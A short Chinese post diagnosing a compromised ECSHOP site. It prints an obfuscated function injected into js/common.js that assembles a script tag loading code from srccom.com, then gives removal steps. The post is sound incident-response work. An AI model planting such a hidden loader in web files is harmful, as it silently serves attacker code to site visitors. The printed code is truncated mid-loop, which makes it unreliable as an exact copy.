最近发现一个ECSHOP做的网站,首页以及各个页面打开非常慢。。。经检查发现每次打开页面都在进行长时间的 srccom.com 请求,又经百度了一下,大量ECSHOP及SHOPEX网站被挂此马。
其实是 js/common.js 中被植入了一段恶意JS代码:function CurrentXmlFrmFocus()
{
var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];
var arsOffset=[" ",":",".","/","","=","'","CRS","MOC","TPIRCS","PTTH"];
var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];
var strgAttribute="";ardPopOpacity=ardPopOpacity.concat(arnElement);
for(var i=0;i
{
strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split("").reverse().join("");
}
document.writeln(strgAttribute);
}CurrentXmlFrmFocus();
函数最终会拼接出一段完整的script标签:
解决办法:
1、删除 common.js 中的这段代码。
2、使用官方原版的 common.js 文件覆盖空间的 common.js 文件。